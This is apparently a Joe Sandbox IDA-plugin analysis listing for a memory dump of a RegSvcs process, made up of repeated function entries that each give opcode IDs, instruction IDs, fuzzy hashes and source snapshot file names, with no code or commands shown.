                                                        • Opcode ID: 6ad8cb0d596ba99fb5f1d3f97aca3308fa089761c44d2b85178bf036bd4ce7eb
                                                        • Instruction ID: a88815b5f5d27b3e07cfefe8d623fb01d95a9bc540c68134d4c20b561dcb37ce
                                                        • Opcode Fuzzy Hash: 6ad8cb0d596ba99fb5f1d3f97aca3308fa089761c44d2b85178bf036bd4ce7eb
                                                        • Instruction Fuzzy Hash: 0A316975A00225DFCF18CF1CCC849AEB7BAEF84304B15855AF9099B391E772EA51CB94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98960e4755bd79b88c2eb9ed248a7a4effb7e9bc2c9b48b60ec1bfe0b798447c
                                                        • Instruction ID: bfa89cbe944077c1b81dfcca5daf28663a7c48b96df5aa2e29518e1a0e605128
                                                        • Opcode Fuzzy Hash: 98960e4755bd79b88c2eb9ed248a7a4effb7e9bc2c9b48b60ec1bfe0b798447c
                                                        • Instruction Fuzzy Hash: 89219C719002299BCB259F59CC81ABEBBF8FF49740B400069F941AB240D738AD42CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9afd3c13942ca18680865cd3f551455085372b537efc9ced900e593dd6db1dd
                                                        • Instruction ID: edd765f016212f9c74e2d7e4294b08d17f5816bf3f21685f11693c8de852192f
                                                        • Opcode Fuzzy Hash: a9afd3c13942ca18680865cd3f551455085372b537efc9ced900e593dd6db1dd
                                                        • Instruction Fuzzy Hash: 72218972600645AFD715DBACDD84A6AB7A8FF88740F144069F904DB7A1D738ED40CBA8
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15adc9aa1c2433ba201b037d0f6eeea7d277b8b8d953882fc62776f78181cdfe
                                                        • Instruction ID: c05cc92ae3976946a9fc1012d8ff5e48307c3ab76a0b245e93911627e9703512
                                                        • Opcode Fuzzy Hash: 15adc9aa1c2433ba201b037d0f6eeea7d277b8b8d953882fc62776f78181cdfe
                                                        • Instruction Fuzzy Hash: 9421C2729043469FD711EF59DD48B6BBBDCAF91240F48445ABD80C7351D734DD05CAA2
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21aee5a469af3b6baf9895dc3956a96f06e8bf0ac83074c79a5d9fdba4e1e2f2
                                                        • Instruction ID: 8b91dbabc47b5adbd4429439c49cd1c6b070e55e7c44a68b11b69dcd7d0458ea
                                                        • Opcode Fuzzy Hash: 21aee5a469af3b6baf9895dc3956a96f06e8bf0ac83074c79a5d9fdba4e1e2f2
                                                        • Instruction Fuzzy Hash: EB2107327056819BF3226B6C9D18B287BD5AF81770F290369FA20DB7D2D768C842C254
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c209977cd9a4ccc028108c2e1b0845c4e022e8044c4c5ac3089dff072389fa20
                                                        • Instruction ID: ac94cd35f7cd6905ba1ddbbfc190dc3695a7761e694aad3fc3373c1008565ee9
                                                        • Opcode Fuzzy Hash: c209977cd9a4ccc028108c2e1b0845c4e022e8044c4c5ac3089dff072389fa20
                                                        • Instruction Fuzzy Hash: EF21AC75240B019FCB25DF69CC00B46B7F5BF48708F14856CA90ACB762E775E842CB98
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc874efefea255385deef5564392976d9a1c5f067906a47c5c4ae41b96be03d8
                                                        • Instruction ID: e5f508b1862b72fa6ba2e03f32281515b54bf80f90ab7cdd77e86369db451949
                                                        • Opcode Fuzzy Hash: cc874efefea255385deef5564392976d9a1c5f067906a47c5c4ae41b96be03d8
                                                        • Instruction Fuzzy Hash: F4112973784A11BFE72256999C01F27769ADBD4B60F91006CF759CB280EB70DC01879A
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e2e3908a4dd961367bc5897f52a4fc7b28fc3232ef887c73a2379ab3ecd9a81
                                                        • Instruction ID: 8427c8e1b3323411e60e320db90be9f39bf188e506bdb6a3a811089cbc80fa59
                                                        • Opcode Fuzzy Hash: 0e2e3908a4dd961367bc5897f52a4fc7b28fc3232ef887c73a2379ab3ecd9a81
                                                        • Instruction Fuzzy Hash: AA21D4B1E00219ABCB24DFAAD8809AEFBF9FF99710F10412EE405A7254DB749941CF54
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                        • Instruction ID: 157c3226c56c9792e13da7f0563adddf03877fa680374fd48957f6a839753d17
                                                        • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                        • Instruction Fuzzy Hash: 46216A72A0020AAFDB129F98CC80BEEBBBEEF88311F244459F901A7251D734D9918B50
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                        • Instruction ID: ef359d0b9f8551fd334df26c59769fcd8dfbdf5311d674fbfda2743a337f36a2
                                                        • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                        • Instruction Fuzzy Hash: 31110173601605BFE7229F88CC40F9ABBB9EB80755F10002DFE018B280E671ED44CB65
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64f9f2282f15afc04147de8e3c7a5ce93ace6cb9f2d26efe54525e45fec0bae0
                                                        • Instruction ID: 7564f8bc13e155144a5de5e2433cfda1367d4d3928a11bced8ad23245185a3c7
                                                        • Opcode Fuzzy Hash: 64f9f2282f15afc04147de8e3c7a5ce93ace6cb9f2d26efe54525e45fec0bae0
                                                        • Instruction Fuzzy Hash: D211B271701A319BDB11CF4DCC80A6ABBEDAF5A710B19406DEE089F305D7B2D9018F90
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                        • Instruction ID: 14410992161741f3bfbb3e624077dd7d9e3ac72b8b4a889d6eb2af9a95367527
                                                        • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                        • Instruction Fuzzy Hash: C2218B72600641DFDB758F89C940A66FBE6EB94B10F148A3DE94A87710E730EC01CB80
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2c428bd23cb319fa6cf14ce09c72bacedef094e0d9cdfbf3a02c4b086952c149
                                                        • Instruction ID: 87d7bb335dc30582ee92442e66c20209651ac72be2a7b777f2b832fc03e447ff
                                                        • Opcode Fuzzy Hash: 2c428bd23cb319fa6cf14ce09c72bacedef094e0d9cdfbf3a02c4b086952c149
                                                        • Instruction Fuzzy Hash: 0E214C75A00616DFCB14CF58C981AAABBF9FB88319F34816DD105A7391C771AD16CF90
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 72024d4c2afa6640f15083521983167a89511fe93445aefd4285991c78bec079
                                                        • Instruction ID: 8559f71f09d5b8ec0c1170d2191fa429fecf6207188be17b1a14de3d885f3d70
                                                        • Opcode Fuzzy Hash: 72024d4c2afa6640f15083521983167a89511fe93445aefd4285991c78bec079
                                                        • Instruction Fuzzy Hash: E9216A71600A00EFD7608F69CC80B66B7E9FB84350F84882DE9AAC7650DB70E841CB64
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 755185fd4f447eb454d73b7dcabff4dfb5e7d69eeacee646da23fdd5b57269c1
                                                        • Instruction ID: 3eb40640323d053b30c1112d8725e487ba5f7178b64a32e40b980d01a34b50aa
                                                        • Opcode Fuzzy Hash: 755185fd4f447eb454d73b7dcabff4dfb5e7d69eeacee646da23fdd5b57269c1
                                                        • Instruction Fuzzy Hash: 2F119132240515EBD722EB9DCD80FDA77A9EB95660F114029F2059B251DA70E941C7A0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c06bb0bd38046b6a8f0b30f83706f4f73c7d4aa40e047126981ec83f8121b4f
                                                        • Instruction ID: d7e75b6f5b2c0caa794b950fc8831e6da550b377bb56b3f4ed0320b85e8db3a0
                                                        • Opcode Fuzzy Hash: 0c06bb0bd38046b6a8f0b30f83706f4f73c7d4aa40e047126981ec83f8121b4f
                                                        • Instruction Fuzzy Hash: 5A112637305114AFCB19DB29CC81A6BB267EFD6374B25453DEA22CB391EA71D842C394
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: db533a0ce8437c27b7b29f09a8b7e34ec620369a5c7f2f75bfe3545f51c65d8e
                                                        • Instruction ID: b820310ce6899f9fa842c351c6c9b9f8c9e7d67d99d81be6d9e707bea5cc10df
                                                        • Opcode Fuzzy Hash: db533a0ce8437c27b7b29f09a8b7e34ec620369a5c7f2f75bfe3545f51c65d8e
                                                        • Instruction Fuzzy Hash: BA11BC76A012059BCB65CF59CD80A6ABBE9AB84620F41807DED059B311E770DD00CBA4
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                        • Instruction ID: 0edaf4779cbb109d7ad1ea36c5bcd8ec38fcc8b0a29c67ee8990f5dfd5f8e609
                                                        • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                        • Instruction Fuzzy Hash: 08110436A10905AFDB19CB98CC05B9DBBF6EF84310F058269EC4597380E671AD11CBC0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                        • Instruction ID: be80aa101ad0c63d347a3bc4c24b28879f5e200c141be5c056d3499072a45f84
                                                        • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                        • Instruction Fuzzy Hash: F721E2B5A00B059FD3A0CF29C840B52BBE4FB48B10F10492EE98AC7B40E371E814CB94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                        • Instruction ID: 7720133affdc565300b75cf0c0a4f19f5e45934ee3799fc8dc8ea5f9c2701471
                                                        • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                        • Instruction Fuzzy Hash: 6A11C232600601EFE7219F48CC40B56BBE6EF85754F46842CEA0A9B260DB32DD40DFA0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 51360da2fc8236184c7304c477dea884131305a3c05ffb8d5a4f64e12cbe06c7
                                                        • Instruction ID: bb76ccb2447c567ea80c43d2abf1f7fe20e056e5b7f956f022378d2038677fc5
                                                        • Opcode Fuzzy Hash: 51360da2fc8236184c7304c477dea884131305a3c05ffb8d5a4f64e12cbe06c7
                                                        • Instruction Fuzzy Hash: CE010472605645AFF316A6ADEC98F6B7A8DEF80390F160069FD00CB341DA14DC01C275
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67f357dead2792246e84333172c30f3925a10ffcdbe830539cba519339c3fd36
                                                        • Instruction ID: 7f8514ef4ce3d7fe5a78bf12822abd4a14a425a3ad45cf8fa9812d51baeda750
                                                        • Opcode Fuzzy Hash: 67f357dead2792246e84333172c30f3925a10ffcdbe830539cba519339c3fd36
                                                        • Instruction Fuzzy Hash: 7311C236200A65AFDB25CF59DC80F667BA9EB85764F004519FA288B750CB71E800CF60
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ee5a55da8d91936379d856e41fb39d1889ab4d8d907f2460e2694510ed1b0706
                                                        • Instruction ID: 082e86b85590d4cb0f8f9fd823aab096b2a884122df29baa80a2df2fcf63a289
                                                        • Opcode Fuzzy Hash: ee5a55da8d91936379d856e41fb39d1889ab4d8d907f2460e2694510ed1b0706
                                                        • Instruction Fuzzy Hash: A011E0322006059BD7229A29DC44B67B7A6FFC4210F14442DEB4287B91DF30A802CB90
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: de24391a5249a0ebe51175bdf7153b8b3b048738d99a74042c9a0ed90ccdebbe
                                                        • Instruction ID: 95f9369d0c928d7d685a2d5b55a0e63953674ac4a999cd1b257d94bbf3ef20ff
                                                        • Opcode Fuzzy Hash: de24391a5249a0ebe51175bdf7153b8b3b048738d99a74042c9a0ed90ccdebbe
                                                        • Instruction Fuzzy Hash: 8111CE72A01626ABDB21DF59CD80B5EFBB9EF88750F900068EE01A7300D730AD01CBA5
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0569ef2a552e51e069a3d7431bf331dd3bb2dfb4a02e4a7624d90b6843e9ff55
                                                        • Instruction ID: 11fb1ab6ea9b9969f7724a7f04dab5990f716b34b4a45791b02320c0a15e2192
                                                        • Opcode Fuzzy Hash: 0569ef2a552e51e069a3d7431bf331dd3bb2dfb4a02e4a7624d90b6843e9ff55
                                                        • Instruction Fuzzy Hash: 9201D27150010A9FC329DF1CD844F26BBFAFBC6724F20816EE0048B264D7749C82CB94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                        • Instruction ID: 54f8179331011726ab4b46c89674e138461f5b74e4b4dd9d0599dc1afdf383ff
                                                        • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                        • Instruction Fuzzy Hash: B3118E722016C2DBEB26A72CDD58B257B94FB41758F1901E0EE41CB792F72EC842C2A0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                        • Instruction ID: 91c1d9b6fd424ffe47dbd65f181c33a0aa0d836e0fb984e3fab2670320275928
                                                        • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                        • Instruction Fuzzy Hash: 89019236700615AFE7219F58CC40F7A7EAAEB85750F458428EA059B260E772ED41CF94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                        • Instruction ID: 1fc1c22084cdd101d16e8724c362ebc1707614342a24113f20feacf6cb93cd3c
                                                        • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                        • Instruction Fuzzy Hash: F00126714067619BCB318F59DC40AB27BA9EF55760B08C62DFC958B285C331D401CB60
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cb087ac9d69072ead517004126850c60c3d2660bdc7d6eba37c6807c3ca4280
                                                        • Instruction ID: a4fccbc8259fed37d647ae07b414b4ceec3258ca47f8bc2c098d1cdbac3879c9
                                                        • Opcode Fuzzy Hash: 4cb087ac9d69072ead517004126850c60c3d2660bdc7d6eba37c6807c3ca4280
                                                        • Instruction Fuzzy Hash: 7C01D6726415019FC732DF1CDC40E13B7A9EB91770B15425DEA689B696EB30D801C7D0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc0131e0e2fa1b4c7a1be9584749a12cd38fce75c68bc95a5c60efb2d84a45a2
                                                        • Instruction ID: 33439ecc6663618f2f242490c3657edf40226af28d1b20243128d9ebff8a3592
                                                        • Opcode Fuzzy Hash: bc0131e0e2fa1b4c7a1be9584749a12cd38fce75c68bc95a5c60efb2d84a45a2
                                                        • Instruction Fuzzy Hash: E711AD32241641EFDB15EF19CD90F16BBB9FF58B44F2000A9F9059B661C336ED01CA94
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d41e300aff6ba72f0c5bf6c6e6c19ebe9ebc5865c064a27dc275f26db38ac285
                                                        • Instruction ID: 301df78779f7e555342fb49b0086fa417c56455ab81b2f4cd65e687ad9f07f5b
                                                        • Opcode Fuzzy Hash: d41e300aff6ba72f0c5bf6c6e6c19ebe9ebc5865c064a27dc275f26db38ac285
                                                        • Instruction Fuzzy Hash: 1311C270502229ABDB25EF28CC51FE87379FF04714F5081D8A718A61E0D7709E81CF88
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: b2ecd00c2dc56ea74dd17eff94e079f6a7a7b4fad22f08866898d0bc11df1a33
                                                        • Instruction ID: 85ab2c29366ef9096b33c0c37ed1564dc6f88a5422bb9dca5e0890dca5fb8621
                                                        • Opcode Fuzzy Hash: b2ecd00c2dc56ea74dd17eff94e079f6a7a7b4fad22f08866898d0bc11df1a33
                                                        • Instruction Fuzzy Hash: 2D018FB1284601AFD3315B19DD50B22BAB9EF95F60F05442EB2169B390D7B1A8418B68
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 025dbcc6e91b5d88cc4667d576eb0dff0684e1d1138346ce9b348d1fb6c084d2
                                                        • Instruction ID: 5a67bd4cf47d0f0547f85042cb5d512d6d4cce957957015ce90813fffe27bd57
                                                        • Opcode Fuzzy Hash: 025dbcc6e91b5d88cc4667d576eb0dff0684e1d1138346ce9b348d1fb6c084d2
                                                        • Instruction Fuzzy Hash: 65F0A433A41B21B7C7319B5A8D50F57BAAAEBC4B90F15842DE606A7740DA34ED01CAA0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                        • Instruction ID: 6e88c0e01b46e890c05b090dd98b440f11268dad550fd637c3b3b19c44a3585a
                                                        • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                        • Instruction Fuzzy Hash: 92F062B2601615ABD328CF4DDC40E57FBEEDBD5A90F05812DA555D7320EA31DD05CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a754ad86a7b7228dac79a62fad5b118a81e54a2522501f8832f492284a7b551d
                                                        • Instruction ID: 5c062f96e283f9ceb12ce10ba2cdb825ab6ee17d45f382049c5675fa73bfe1b2
                                                        • Opcode Fuzzy Hash: a754ad86a7b7228dac79a62fad5b118a81e54a2522501f8832f492284a7b551d
                                                        • Instruction Fuzzy Hash: 38012176A10209ABDB04DFA9D951A9EB7F8FF58704F10405AE904E7350D6749A018BA4
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015F0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_15f0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                        • Instruction ID: 20e5c249db115cf97c134ee0d0eb5f6dca3ae0c6010ea47362951b4820ff6788
                                                        • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
